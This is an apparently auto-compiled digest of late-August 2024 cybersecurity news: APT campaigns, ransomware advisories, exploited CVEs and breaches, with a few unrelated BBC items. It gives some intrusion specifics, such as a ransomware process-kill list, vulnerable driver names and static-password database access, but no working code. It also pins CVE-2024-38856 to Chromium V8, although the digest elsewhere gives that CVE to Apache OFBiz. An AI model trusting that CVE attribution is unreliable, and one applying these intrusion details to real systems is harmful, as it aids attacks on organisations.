          2024-08-29 https://www.bleepingcomputer.com/news/security/russian-apt29-hackers-use-ios-chrome-exploits-created-by-spyware-vendors/
The Russian state-sponsored APT29 hacking group has been observed using the same iOS and Android exploits created by commercial spyware vendors in a series of cyberattacks between November 2023 and July 2024. [...]

Autosummary: In 2021, the Russian cyber-operatives exploited CVE-2021-1879 as a zero-day, targeting government officials in Eastern Europe, attempting to deliver a cookie-stealing framework that snatched LinkedIn, Gmail, and Facebook accounts.


          ‘Big-game hunting’ – Ransomware gangs are focusing on more lucrative attacks

          exploits ransomware
          2024-08-29 https://www.exponential-e.com/blog/big-game-hunting-ransomware-gangs-are-focusing-on-more-lucrative-attacks
2024 looks set to be the highest-grossing year yet for ransomware gangs, due - in no small part - to emboldened cybercriminals causing costly disruption at larger companies. Read more in my article on the Exponential-e blog.



          Midnight Blizzard delivered iOS, Chrome exploits via compromised government websites

          exploits government
          2024-08-29 https://www.helpnetsecurity.com/2024/08/29/n-day-exploits-government-websites/

          Suspected Russian hackers have been hitting iPhone and Android users visiting government websites with exploits first leveraged by commercial surveillance vendors, Google TAG researchers shared. The watering hole campaigns Between November 2023 and July 2024, threat actors have repeatedly compromised the websites of the Mongolian Cabinet Secretariat (cabinet.gov[.]mn) and the country’s Ministry of Foreign Affairs (mfa.gov[.]mn) to serve iframes or JavaScript delivering an exploit or exploit chain. The threat actors leveraged Intellexa’s CVE-2023-41993 (WebKit) exploit … More




U.S. Agencies Warn of Iranian Hacking Group's Ongoing Ransomware Attacks

          exploits ransomware
          2024-08-29 https://thehackernews.com/2024/08/us-agencies-warn-of-iranian-hacking.html
U.S. cybersecurity and intelligence agencies have called out an Iranian hacking group for breaching multiple organizations across the country and coordinating with affiliates to deliver ransomware. The activity has been linked to a threat actor dubbed Pioneer Kitten, which is also known as Fox Kitten, Lemon Sandstorm (formerly Rubidium), Parisite, and UNC757, which it described as connected to

          Autosummary: " Initial access is accomplished by taking advantage of remote external services on internet-facing assets that are vulnerable to previously disclosed flaws (CVE-2019-19781, CVE-2022-1388, CVE-2023-3519, CVE-2024-3400, and CVE-2024-24919), followed by a series of steps to persist, escalate privileges, and set up remote access through tools like AnyDesk or the open-source Ligolo tunneling tool. Peach Sandstorm Delivers Tickler Malware in Long-Running Campaign The development comes as Microsoft said it observed Iranian state-sponsored threat actor Peach Sandstorm (aka APT33, Curious Serpens, Elfin, and Refined Kitten) deploying a new custom multi-stage backdoor referred to as Tickler in attacks against targets in the satellite, communications equipment, oil and gas, as well as federal and state government sectors in the U.S. and U.A.E. between April and July 2024. "


          Malware exploits 5-year-old zero-day to infect end-of-life IP cameras

          exploits
          2024-08-29 https://www.bleepingcomputer.com/news/security/malware-exploits-5-year-old-zero-day-to-infect-end-of-life-ip-cameras/
          The Corona Mirai-based malware botnet is spreading through a 5-year-old remote code execution (RCE) zero-day in AVTECH IP cameras, which have been discontinued for years and will not receive a patch. [...] "

          Autosummary: The flaw, discovered by Akamai's Aline Eliovich, is tracked as CVE-2024-7029 and is a high-severity (CVSS v4 score: 8.7) issue in the "brightness" function of the cameras, allowing unauthenticated attackers to inject commands over the network using specially crafted requests. "


          #StopRansomware: RansomHub Ransomware

          exploits ransomware
          2024-08-29 https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-242a

          Summary

          Note: This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

          The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Multi-State Information Sharing and Analysis Center (MS-ISAC), and the Department of Health and Human Services (HHS) (hereafter referred to as the authoring organizations) are releasing this joint advisory to disseminate known RansomHub ransomware IOCs and TTPs. These have been identified through FBI threat response activities and third-party reporting as recently as August 2024. RansomHub is a ransomware-as-a-service variant—formerly known as Cyclops and Knight—that has established itself as an efficient and successful service model (recently attracting high-profile affiliates from other prominent variants such as LockBit and ALPHV).

          Since its inception in February 2024, RansomHub has encrypted and exfiltrated data from at least 210 victims representing the water and wastewater, information technology, government services and facilities, healthcare and public health, emergency services, food and agriculture, financial services, commercial facilities, critical manufacturing, transportation, and communications critical infrastructure sectors.

          The affiliates leverage a double-extortion model by encrypting systems and exfiltrating data to extort victims. It should be noted that data exfiltration methods are dependent on the affiliate conducting "

          Autosummary: To successfully encrypt files that are currently in use, the ransomware binary will typically attempt to stop the following processes: "vmms.exe", "msaccess.exe", "mspub.exe", "svchost.exe", "vmcompute.exe", "notepad.exe", "ocautoupds.exe", "ocomm.exe", "ocssd.exe", "oracle.exe", "onenote.exe", "outlook.exe", "powerpnt.exe", "explorer.exe", "sql.exe", "steam.exe", "synctime.exe", "vmwp.exe", "thebat.exe", "thunderbird.exe", "visio.exe", "winword.exe", "wordpad.exe", "xfssvccon.exe", "TeamViewer.exe", "agntsvc.exe", "dbsnmp.exe", "dbeng50.exe", "encsvc.exe". The ransomware binary will attempt to encrypt any files that the user has access to, including user files and networked shares. Since its inception in February 2024, RansomHub has encrypted and exfiltrated data from at least 210 victims representing the water and wastewater, information technology, government services and facilities, healthcare and public health, emergency services, food and agriculture, financial services, commercial facilities, critical manufacturing, transportation, and communications critical infrastructure sectors. A heap-based buffer overflow vulnerability in FortiOS version 7.2.4 and below, version 7.0.11 and below, version 6.4.12 and below, version 6.0.16 and below and FortiProxy version 7.2.3 and below, version 7.0.9 and below, version 2.0.12 and below, version 1.2 all versions, version 1.1 all versions SSL-VPN may allow a remote attacker to execute arbitrary code or commands via specifically crafted requests. Data exfiltration has been observed through the usage of tools such as PuTTY [T1048.002], Amazon AWS S3 buckets/tools [T1537], HTTP POST requests [T1048.003], WinSCP, Rclone, Cobalt Strike, Metasploit, and other methods.
          The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Multi-State Information Sharing and Analysis Center (MS-ISAC), and the Department of Health and Human Services (HHS) (hereafter referred to as the authoring organizations) are releasing this joint advisory to disseminate known RansomHub ransomware IOCs and TTPs. "


          $2.5 million reward offered for hacker linked to notorious Angler Exploit Kit

          exploits
          2024-08-29 https://www.tripwire.com/state-of-security/25-million-reward-offered-cyber-criminal-linked-notorious-angler-exploit-kit
          Who doesn't fancy earning US $2.5 million? That's the reward that's on offer from US authorities for information leading to the arrest and/or conviction of the man who allegedly was a key figure behind the development and distribution of the notorious Angler Exploit Kit. Read more in my article on the Tripwire State of Security blog. "

          Autosummary: "


          Vietnamese Human Rights Group Targeted in Multi-Year Cyberattack by APT32

          ciber
          2024-08-29 https://thehackernews.com/2024/08/vietnamese-human-rights-group-targeted.html
          A non-profit supporting Vietnamese human rights has been the target of a multi-year campaign designed to deliver a variety of malware on compromised hosts. Cybersecurity company Huntress attributed the activity to a threat cluster known as APT32, a Vietnamese-aligned hacking crew that's also known as APT-C-00, Canvas Cyclone (formerly Bismuth), Cobalt Kitty, and OceanLotus. The intrusion is "

          Autosummary: "


          Russian Hackers Exploit Safari and Chrome Flaws in High-Profile Cyberattack

          exploits rusia-ucrania ciber
          2024-08-29 https://thehackernews.com/2024/08/russian-hackers-exploit-safari-and.html
          Cybersecurity researchers have flagged multiple in-the-wild exploit campaigns that leveraged now-patched flaws in Apple Safari and Google Chrome browsers to infect mobile users with information-stealing malware. "These campaigns delivered n-day exploits for which patches were available, but would still be effective against unpatched devices," Google Threat Analysis Group (TAG) researcher Clement "

          Autosummary: CVE-2024-4671 - A use-after-free flaw in Chrome's Visuals component that could result in arbitrary code execution (Fixed by Google in Chrome version 124.0.6367.201/.202 for Windows and macOS, and version 124.0.6367.201 for Linux in May 2024)
          CVE-2024-5274 - A type confusion flaw in the V8 JavaScript and WebAssembly engine that could result in arbitrary code execution (Fixed by Google in Chrome version 125.0.6422.112/.113 for Windows and macOS, and version 125.0.6422.112 for Linux in May 2024)
          The November 2023 and February 2024 campaigns are said to have involved the compromises of the two Mongolian government websites – both in the first and only mfa.gov[.]mn in the latter – to deliver an exploit for CVE-2023-41993 by means of a malicious iframe component pointing to an actor-controlled domain. "


          How AitM Phishing Attacks Bypass MFA and EDR—and How to Fight Back

          financial
          2024-08-29 https://thehackernews.com/2024/08/how-to-stop-aitm-phishing-attack.html
          Attackers are increasingly using new phishing toolkits (open-source, commercial, and criminal) to execute adversary-in-the-middle (AitM) attacks. AitM enables attackers to not just harvest credentials but steal live sessions, allowing them to bypass traditional phishing prevention controls such as MFA, EDR, and email content filtering. In this article, we’re going to look at what AitM phishing "

          Autosummary: But, we only really need to look at what recent high-profile breaches show us about how lucrative it can be for attackers to find ways to take over workforce identities in order to access web-based business applications – with the recent Snowflake attacks, going down as one of the biggest breaches in history, being the elephant in the room. Attackers are bypassing existing controls with ease. Existing phishing prevention solutions have tried to solve the problem by protecting the email inbox, a common (but not the only) attack vector, and blocking lists of known-bad domains. Attackers are increasingly using new phishing toolkits (open-source, commercial, and criminal) to execute adversary-in-the-middle (AitM) attacks. And even if they are reported, it's trivial for attackers to obfuscate or change these components: You could look for known-bad URLs in emails, but these change for every phishing campaign. In this article, we're going to look at what AitM phishing is, how it works, and what organizations need to be able to detect and block these attacks effectively. AitM enables attackers to not just harvest credentials but steal live sessions, allowing them to bypass traditional phishing prevention controls such as MFA, EDR, and email content filtering. AitM and BitM attack and detection demo: Check out the video below to see a demonstration of the Evilginx and EvilNoVNC phishing toolkits in action, as well as how browser-based security controls can be used to detect and block them before the phishing attack is completed. "


          Unpatched AVTECH IP Camera Flaw Exploited by Hackers for Botnet Attacks

          exploits
          2024-08-29 https://thehackernews.com/2024/08/unpatched-avtech-ip-camera-flaw.html
          A years-old high-severity flaw impacting AVTECH IP cameras has been weaponized by malicious actors as a zero-day to rope them into a botnet. CVE-2024-7029 (CVSS score: 8.7), the vulnerability in question, is a "command injection vulnerability found in the brightness function of AVTECH closed-circuit television (CCTV) cameras that allows for remote code execution (RCE)," Akamai researchers Kyle "

          Autosummary: CVE-2024-7029 (CVSS score: 8.7), the vulnerability in question, is a "command injection vulnerability found in the brightness function of AVTECH closed-circuit television (CCTV) cameras that allows for remote code execution (RCE)," Akamai researchers Kyle Lefton, Larry Cashdollar, and Aline Eliovich said. "


          Halliburton cyberattack linked to RansomHub ransomware gang

          exploits ransomware ciber
          2024-08-29 https://www.bleepingcomputer.com/news/security/halliburton-cyberattack-linked-to-ransomhub-ransomware-gang/
          The RansomHub ransomware gang is behind the recent cyberattack on oil and gas services giant Halliburton, which disrupted the company's IT systems and business operations. [...] "

          Autosummary: "As soon as we learned of the issue, we activated our cybersecurity response plan and took steps to address it, including (1) proactively taking certain systems offline to help protect them, (2) engaging the support of leading external advisors, including Mandiant, and (3) notifying law enforcement. However, soon after, it was discovered that the operation also utilized ransomware encryptors in its double-extortion attacks, where the threat actors breached networks, stole data, and then encrypted files. "


          FBI: RansomHub ransomware breached 210 victims since February

          exploits ransomware
          2024-08-29 https://www.bleepingcomputer.com/news/security/fbi-ransomhub-ransomware-breached-210-victims-since-february/
          ​Since surfacing in February 2024, RansomHub ransomware affiliates have breached over 200 victims from a wide range of critical U.S. infrastructure sectors. [...] "

          Autosummary: "


          Corona Mirai botnet spreads via AVTECH CCTV zero-day

          exploits
          2024-08-29 https://securityaffairs.com/167764/malware/corona-mirai-botnet-avtech-cctv-zero-day.html
          An instance of the Corona Mirai botnet spreads via AVTECH CCTV zero-day and multiple previously known vulnerabilities. Akamai’s Security Intelligence and Response Team (SIRT) has detected a botnet campaign exploiting multiple previously known vulnerabilities and a newly discovered zero-day, tracked as CVE-2024-7029 (CVSS score: 8.7), in AVTECH CCTV cameras. The flaw is a command injection issue […] "

          Autosummary: Akamai’s Security Intelligence and Response Team (SIRT) has detected a botnet campaign exploiting multiple previously known vulnerabilities and a newly discovered zero-day, tracked as CVE-2024-7029 (CVSS score: 8.7), in AVTECH CCTV cameras. "


          Iran-linked group APT33 adds new Tickler malware to its arsenal

          exploits
          2024-08-29 https://securityaffairs.com/167730/apt/apt33-used-new-tickler-malware.html
          Iran-linked group APT33 used new Tickler malware in attacks against organizations in the government, defense, satellite, oil and gas sectors. Microsoft researchers reported that the Iran-linked cyberespionage group APT33 (aka Peach Sandstorm, Holmium, Elfin, Refined Kitten, and Magic Hound) used a new custom multi-stage backdoor called Tickler to compromise organizations in sectors such as government, defense, satellite, oil, and gas […] "

          Autosummary: Microsoft researchers reported that the Iran-linked cyberespionage group APT33 (aka Peach Sandstorm, Holmium, Elfin, Refined Kitten, and Magic Hound) used a new custom multi-stage backdoor called Tickler to compromise organizations in sectors such as government, defense, satellite, oil, and gas in the U.S. and UAE. "


          Spanish actor's son jailed for murder of Colombian

          latam
          2024-08-29 https://www.bbc.com/news/articles/cwyxry3k9rgo
          Daniel Sancho claimed he acted in self-defence when he killed plastic surgeon Edwin Arrieta in Thailand. "

          Autosummary: At the time, Sancho, now 30, told Spanish news agency EFE he had been a "hostage" to Arrieta, who he said was obsessed with him. "


          Argentina police pepper spray pension protesters

          latam
          2024-08-29 https://www.bbc.com/news/videos/c2l1r92e5rzo
          They were protesting the president's plan to veto measures to raise pensions in line with Argentina's triple-digit inflation. "

          Autosummary: "


          Brazil police clamp down on claw machines

          latam
          2024-08-29 https://www.bbc.com/news/videos/cgky23m80v5o
          Officers are investigating whether organised crime gangs are involved in running the machines. "

          Autosummary: "


          Cybersecurity jobs available right now: August 28, 2024

          ciber
          2024-08-28 https://www.helpnetsecurity.com/2024/08/28/cybersecurity-jobs-available-right-now-august-28-2024/

          Business Information Security Officer Toyota North America | USA | On-site. Acting as an Information Security ambassador to the business, this role works with technology, data, risk, business, and the larger TFS Information Security team to provide relationship-based security services to the business, promote secure designs, and manage the execution of security testing and remediation. Cyber Security Consultant WithSecure | UK | On-site. The ideal candidate will … More

          The post Cybersecurity jobs available right now: August 28, 2024 appeared first on Help Net Security.

          "

          Autosummary: Business Information Security Officer Toyota North America | USA | On-site. Acting as an Information Security ambassador to the business, this role works with technology, data, risk, business, and the larger TFS Information Security team to provide relationship-based security services to the business, promote secure designs, and manage the execution of security testing and remediation. "


          Cybercriminals capitalize on travel industry’s peak season

          industry ciber
          2024-08-28 https://www.helpnetsecurity.com/2024/08/28/cybercriminals-capitalize-travel-season/

          Cybercriminals are capitalizing on the travel and hospitality industry’s peak season, using increased traffic as cover for their attacks, according to Cequence Security. Researchers investigated the top 10 travel and hospitality sites to identify externally visible edge, cloud infrastructure, application stack, API hosts, and security vulnerabilities. Threat researchers observed a consistent pattern across industries: increased website traffic during peak seasons, like the travel and hospitality industry’s vacation and holiday periods, coincides with a surge in … More

          The post Cybercriminals capitalize on travel industry’s peak season appeared first on Help Net Security.

          "

          Autosummary: Researchers investigated the top 10 travel and hospitality sites to identify externally visible edge, cloud infrastructure, application stack, API hosts, and security vulnerabilities. "


          University criticised for using Ebola outbreak lure in phishing test

          financial
          2024-08-28 https://www.bitdefender.com/blog/hotforsecurity/university-criticised-for-using-ebola-outbreak-lure-in-phishing-test/
          A phishing exercise conducted by the IT department of the University of California Santa Cruz (UCSC) has backfired, after causing unnecessary panic amongst students and staff. Read more in my article on the Hot for Security blog. "

          Autosummary: "


          APT group exploits WPS Office for Windows RCE vulnerability (CVE-2024-7262)

          exploits
          2024-08-28 https://www.helpnetsecurity.com/2024/08/28/cve-2024-7262-cve-2024-7263/

          ESET researchers discovered a remote code execution vulnerability in WPS Office for Windows (CVE-2024-7262). APT-C-60, a South Korea-aligned cyberespionage group, was exploiting it to target East Asian countries. When examining the root cause, ESET discovered another way to exploit the faulty code (CVE-2024-7263).

          Overview of the exploit’s control flow (Source: ESET)

          Following a coordinated disclosure process, both vulnerabilities are now patched. The final payload in the APT-C-60 attack is a custom backdoor with cyberespionage capabilities … More

          The post APT group exploits WPS Office for Windows RCE vulnerability (CVE-2024-7262) appeared first on Help Net Security.

          "

          Autosummary: The WPS Office software has over 500 million active users worldwide, which makes it a good target to reach a substantial number of individuals, particularly in the East Asia region,” says ESET researcher Romain Dumont, who analyzed the vulnerabilities. "


          Critical Fortra FileCatalyst Workflow vulnerability patched (CVE-2024-6633)

          exploits
          2024-08-28 https://www.helpnetsecurity.com/2024/08/28/cve-2024-6633/

          Organizations using Fortra’s FileCatalyst Workflow are urged to upgrade their instances, so that attackers can’t access an internal HSQL database by exploiting known static credentials (CVE-2024-6633). “Once logged in to the HSQLDB, the attacker can perform malicious operations in the database. For example, the attacker can add an admin-level user in the DOCTERA_USERS table, allowing access to the Workflow web application as an admin user,” Tenable researchers discovered. Two flaws fixed Fortra FileCatalyst Workflow is … More

          The post Critical Fortra FileCatalyst Workflow vulnerability patched (CVE-2024-6633) appeared first on Help Net Security.

          "

          Autosummary: Following the steps outlined in the vendor KB article but using a remote JDBC URL (i.e., jdbc:hsqldb:hsql:// :4406/hsqldb), unauthenticated, remote attackers may access the database by leveraging the documented static password. "


          CISA Flags Critical Apache OFBiz Flaw Amid Active Exploitation Reports

          exploits
          2024-08-28 https://thehackernews.com/2024/08/cisa-flags-critical-apache-ofbiz-flaw.html
          The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added a critical security flaw affecting the Apache OFBiz open-source enterprise resource planning (ERP) system to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild. The vulnerability, known as CVE-2024-38856, carries a CVSS score of 9.8, indicating critical severity. "

          Autosummary: "


          New QR Code Phishing Campaign Exploits Microsoft Sway to Steal Credentials

          financial exploits
          2024-08-28 https://thehackernews.com/2024/08/new-qr-code-phishing-campaign-exploits.html
          Cybersecurity researchers are calling attention to a new QR code phishing (aka quishing) campaign that leverages Microsoft Sway infrastructure to host fake pages, once again highlighting the abuse of legitimate cloud offerings for malicious purposes. "By using legitimate cloud applications, attackers provide credibility to victims, helping them to trust the content it serves," Netskope Threat "

          Autosummary: In April 2020, Group-IB detailed a campaign dubbed PerSwaysion that successfully compromised corporate email accounts of at least 156 high-ranking officers at various firms based in Germany, the U.K., the Netherlands, Hong Kong, and Singapore by using Sway as the jumping board to redirect victims to credential harvesting sites. "


          Dragos Platform updates streamline OT threat and vulnerability workflows

          exploits
          2024-08-28 https://www.helpnetsecurity.com/2024/08/28/dragos-platform/

          Dragos announced the latest release of the Dragos Platform, an OT network visibility and cybersecurity platform. The updates provide industrial and critical infrastructure organizations with even deeper and enriched visibility into all assets in their OT environments, streamlined workflows for threat detection and vulnerability management that allow for efficient and effective response, and powerful integration of Dragos WorldView intelligence and Neighborhood Keeper community intelligence on current and emerging threats. Industrial organizations worldwide are grappling with … More

          The post Dragos Platform updates streamline OT threat and vulnerability workflows appeared first on Help Net Security.

          "

          Autosummary: As threats to OT environments continue to evolve, Dragos remains at the forefront of OT-specific threat detection: Over 1,000 new threat detections, vulnerabilities and response playbooks added: The latest updates introduce over 1,000 new threat detections, addressing emerging threats such as CyberAveng3rs, FrostyGoop and other advanced threats. The evolved integration of the Platform with Dragos’s Neighborhood Keeper and WorldView threat intelligence streamlines vulnerability management, threat detection, and response workflows to meet emerging threats like FrostyGoop and PIPEDREAM malware; Unitronics vulnerabilities; and VOLTZITE, CyberAveng3rs, and CHERNOVITE threat groups targeting OT environments. "


          BlackByte Ransomware Exploits VMware ESXi Flaw in Latest Attack Wave

          exploits ransomware
          2024-08-28 https://thehackernews.com/2024/08/blackbyte-ransomware-exploits-vmware.html
          The threat actors behind the BlackByte ransomware group have been observed likely exploiting a recently patched security flaw impacting VMware ESXi hypervisors, while also leveraging various vulnerable drivers to disarm security protections. "The BlackByte ransomware group continues to leverage tactics, techniques, and procedures (TTPs) that have formed the foundation of its tradecraft since its "

          Autosummary: A majority of the attacks have targeted healthcare, finance, and government sectors in the U.S., Brazil, Italy, Spain, and the U.K. "For initial access the affiliates usually purchase compromised valid domain accounts from Initial Access Brokers (IABs) and external remote services," Group-IB said, adding the "accounts have been acquired via LummaC2 stealer." All the four drivers follow a similar naming convention: eight random alphanumeric characters followed by an underscore and an incremental numerical value:
          AM35W2PH (RtCore64.sys)
          AM35W2PH_1 (DBUtil_2_3.sys)
          AM35W2PH_2 (zamguard64.sys aka Terminator)
          AM35W2PH_3 (gdrv.sys)
          The professional, scientific, and technical services sectors have the greatest exposure to the observed vulnerable drivers, accounting for 15% of the total, followed by manufacturing (13%) and educational services (13%). "


          Iranian hackers work with ransomware gangs to extort breached orgs

          exploits ransomware
          2024-08-28 https://www.bleepingcomputer.com/news/security/iranian-hackers-work-with-ransomware-gangs-to-extort-breached-orgs/
          An Iran-based hacking group known as Pioneer Kitten is breaching defense, education, finance, and healthcare organizations across the United States and working with affiliates of several ransomware operations to extort the victims. [...] "

          Autosummary: "


          Google increases Chrome bug bounty rewards up to $250,000

          exploits
          2024-08-28 https://www.bleepingcomputer.com/news/google/google-increases-chrome-bug-bounty-rewards-up-to-250-000/
          Google has more than doubled payouts for Google Chrome security flaws reported through its Vulnerability Reward Program, with the maximum possible reward for a single bug now exceeding $250,000. [...] "

          Autosummary: "


          DICK’s Sporting Goods says confidential data exposed in cyberattack

          ciber
          2024-08-28 https://www.bleepingcomputer.com/news/security/dicks-sporting-goods-says-confidential-data-exposed-in-cyberattack/
          DICK'S Sporting Goods, the largest chain of sporting goods retail stores in the United States, disclosed that sensitive information was exposed in a cyberattack detected last Wednesday. [...] "

          Autosummary: "On August 21, 2024, the Company discovered unauthorized third-party access to its information systems, including portions of its systems containing certain confidential information," the retailer giant said. "


          Pioneer Kitten: Iranian hackers partnering with ransomware affiliates

          exploits ransomware
          2024-08-28 https://www.helpnetsecurity.com/2024/08/28/pioneer-kitten-iranian-hackers-partnering-with-ransomware-affiliates/

          A group of Iranian hackers – dubbed Pioneer Kitten by cybersecurity researchers – is straddling the line between state-contracted cyber espionage group and initial access provider (and partner in crime) for affiliates of several ransomware groups. “The FBI assesses these actors do not disclose their Iran-based location to their ransomware affiliate contacts and are intentionally vague as to their nationality and origin,” US security agencies say. Also, “the group’s ransomware activities are likely not sanctioned … More

          The post Pioneer Kitten: Iranian hackers partnering with ransomware affiliates appeared first on Help Net Security.

          "

          Autosummary: Iranian hackers working with ransomware affiliates: Pioneer Kitten – also known as Fox Kitten, UNC757, Parisite, RUBIDIUM, and Lemon Sandstorm in the cybersecurity research community – is a group that refers to itself as “xplfinder” and, more recently, “Br0k3r”. "


          Diligent NIS2 Compliance Toolkit helps organizations bolster their cybersecurity resilience

          ciber
          2024-08-28 https://www.helpnetsecurity.com/2024/08/28/diligent-nis2-compliance-toolkit/

          Diligent launched its Network and Information Security Directive (NIS2) Compliance Toolkit, designed to help organizations navigate the complexities of the European Union (EU) NIS2 Directive and bolster their cybersecurity resilience. The toolkit maps cybersecurity risk management obligations mandated by NIS2 against Cyber Risk Management Group’s (CRMG) leading controls library, which is based on international standards and best practices. This helps organizations demonstrate a clear commitment to NIS2 compliance requirements to drive trust with customers, partners, … More

          The post Diligent NIS2 Compliance Toolkit helps organizations bolster their cybersecurity resilience appeared first on Help Net Security.

          "

          Autosummary: Powered by CRMG’s leading controls library, Diligent’s NIS2 Compliance Toolkit aligns mandated NIS2 cybersecurity measures with international standards, and provides tailored content to help organizations implement new boardroom accountability, mandatory cybersecurity measures, and incident reporting requirements. "


          Fortra Issues Patch for High-Risk FileCatalyst Workflow Security Vulnerability

          exploits
          2024-08-28 https://thehackernews.com/2024/08/fortra-issues-patch-for-high-risk.html
          Fortra has addressed a critical security flaw impacting FileCatalyst Workflow that could be abused by a remote attacker to gain administrative access. The vulnerability, tracked as CVE-2024-6633, carries a CVSS score of 9.8, and stems from the use of a static password to connect to an HSQL database. "The default credentials for the setup HSQL database (HSQLDB) for FileCatalyst Workflow are "

          Autosummary: "


          APT-C-60 Group Exploit WPS Office Flaw to Deploy SpyGlace Backdoor

          exploits
          2024-08-28 https://thehackernews.com/2024/08/apt-c-60-group-exploit-wps-office-flaw.html
          A South Korea-aligned cyber espionage group has been linked to the zero-day exploitation of a now-patched critical remote code execution flaw in Kingsoft WPS Office to deploy a bespoke backdoor dubbed SpyGlace. The activity has been attributed to a threat actor dubbed APT-C-60, according to cybersecurity firms ESET and DBAPPSecurity. The attacks have been found to infect Chinese and East Asian users "

          Autosummary: Specifically, the file comes embedded with a malicious link that, when clicked, triggers a multi-stage infection sequence to deliver the SpyGlace trojan, a DLL file named TaskControler.dll that comes with file stealing, plugin loading, and command execution capabilities. "


          US offers $2.5 million reward for hacker linked to Angler Exploit Kit

          exploits
          2024-08-28 https://www.bleepingcomputer.com/news/legal/us-offers-25-million-reward-for-hacker-linked-to-angler-exploit-kit/
          The U.S. Department of State and the Secret Service have announced a reward of $2,500,000 for information leading to Belarusian national Volodymyr Kadariya (Владимир Кадария) for cybercrime activities. [...] "

          Autosummary: "


          New Tickler malware used to backdoor US govt, defense orgs

          exploits
          2024-08-28 https://www.bleepingcomputer.com/news/security/APT33-Iranian-hacking-group-uses-new-tickler-malware-to-backdoor-us-govt-defense-orgs/
          The APT33 Iranian hacking group has used new Tickler malware to backdoor the networks of organizations in the government, defense, satellite, oil and gas sectors in the United States and the United Arab Emirates. [...] "

          Autosummary: "


          DICK'S shuts down email, locks employee accounts after cyberattack

          ciber
          2024-08-28 https://www.bleepingcomputer.com/news/security/dicks-shuts-down-email-locks-employee-accounts-after-cyberattack/
DICK'S Sporting Goods, the largest chain of sporting goods retail stores in the United States, disclosed that sensitive information was exposed in a cyberattack detected last Wednesday. [...] "

Autosummary: "On August 21, 2024, the Company discovered unauthorized third-party access to its information systems, including portions of its systems containing certain confidential information," the retail giant said. "


          CODAC Behavioral Healthcare, US Marshalls are latest ransomware targets

          exploits ransomware
          2024-08-28 https://www.malwarebytes.com/blog/news/2024/08/codac-behavioral-healthcare-us-marshalls-are-latest-ransomware-targets
          Ransomware gangs love sensitive data from healthcare and support organizations to increase their leverage on the victims "

Autosummary: The Qilin ransomware group listed CODAC Behavioral Healthcare. Within the stolen data, Malwarebytes Labs noticed financial information, pictures of ID cards, a list of staff members—including their Social Security Numbers (SSNs)—and healthcare cards. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. Hunters International ransomware group posted 386 GB of data that appears to include files on gangs, documents from the FBI, specific case information, operational data, and more. "


          South Korean hackers exploited WPS Office zero-day to deploy malware

          exploits
          2024-08-28 https://www.bleepingcomputer.com/news/security/apt-c-60-hackers-exploited-wps-office-zero-day-to-deploy-spyglace-malware/
          The South Korea-aligned cyberespionage group APT-C-60 has been leveraging a zero-day code execution vulnerability in the Windows version of WPS Office to install the SpyGlace backdoor on East Asian targets. [...] "

Autosummary: Bad patch leaves gap. While investigating APT-C-60's attacks, ESET's researchers discovered CVE-2024-7263, a second arbitrary code execution flaw impacting WPS Office, which stemmed from an incomplete patch of CVE-2024-7262. "


          U.S. CISA adds Google Chromium V8 bug to its Known Exploited Vulnerabilities catalog

          exploits
          2024-08-28 https://securityaffairs.com/167722/security/u-s-cisa-adds-google-chromium-v8-bug-known-exploited-vulnerabilities-catalog.html
          U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Google Chromium V8 bug to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Google Chromium V8 Inappropriate Implementation Vulnerability CVE-2024-38856 (CVSS score of 8.8) to its Known Exploited Vulnerabilities (KEV) catalog. This week Google released a security update to address the Chrome […] "

Autosummary: U.S. CISA adds Google Chromium V8 bug to its Known Exploited Vulnerabilities catalog (Pierluigi Paganini, August 28, 2024). U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Google Chromium V8 bug to its Known Exploited Vulnerabilities catalog. "


          Young Consulting data breach impacts 954,177 individuals

          financial
          2024-08-28 https://securityaffairs.com/167714/data-breach/blacksuit-group-attack-young-consulting.html
          A ransomware attack by the BlackSuit group on Young Consulting compromised the personal information of over 950,000 individuals. Software solutions provider Young Consulting disclosed a data breach impacting 950,000 individuals following a BlackSuit ransomware attack. On April 13 the company “became aware of technical difficulties” that impacted its infrastructure. Attackers gained access to the company […] "

Autosummary: The ransomware gang claimed the theft of the following information: business data (contracts, contacts, planning, presentations, etc.); employee data (passports, contracts, contacts, family details, medical examinations, etc.); financial data (audits, reports, payments, contracts, etc.); other data taken from shares and personal folders. The group added that top management completely refused to negotiate, thinking that they were bluffing. "


          BlackByte Ransomware group targets recently patched VMware ESXi flaw CVE-2024-37085

          exploits ransomware
          2024-08-28 https://securityaffairs.com/167695/malware/blackbyte-ransomware-vmware-esxi-flaw.html
BlackByte ransomware operators are exploiting a recently patched VMware ESXi hypervisor vulnerability in recent attacks. Cisco Talos observed the BlackByte ransomware group exploiting the recently patched security flaw CVE-2024-37085 in VMware ESXi hypervisors in recent attacks. The flaw CVE-2024-37085 (CVSS score of 6.8) is an authentication bypass vulnerability in VMware ESXi. At the end of July, […] "

Autosummary: The group has been active since at least 2021. BlackByte is known for using vulnerable drivers to bypass security, deploying self-propagating ransomware with worm-like abilities, and leveraging legitimate system binaries and commercial tools in its attacks. BlackByte Ransomware group targets recently patched VMware ESXi flaw CVE-2024-37085 (Pierluigi Paganini, August 28, 2024). BlackByte ransomware operators are exploiting a recently patched VMware ESXi hypervisor vulnerability in recent attacks. "


          US offers $2.5M reward for Belarusian man involved in mass malware distribution

          exploits rusia-ucrania
          2024-08-28 https://securityaffairs.com/167684/cyber-crime/belarusian-man-mass-malware-distribution.html
          The US Department of State offers a $2.5 million reward for information leading to the arrest of a Belarusian cybercriminal involved in the mass malware distribution. The US Department of State announced a $2.5 million reward for information leading to the arrest of Volodymyr Kadariya (38), a Belarusian national allegedly involved in a significant malware […] "

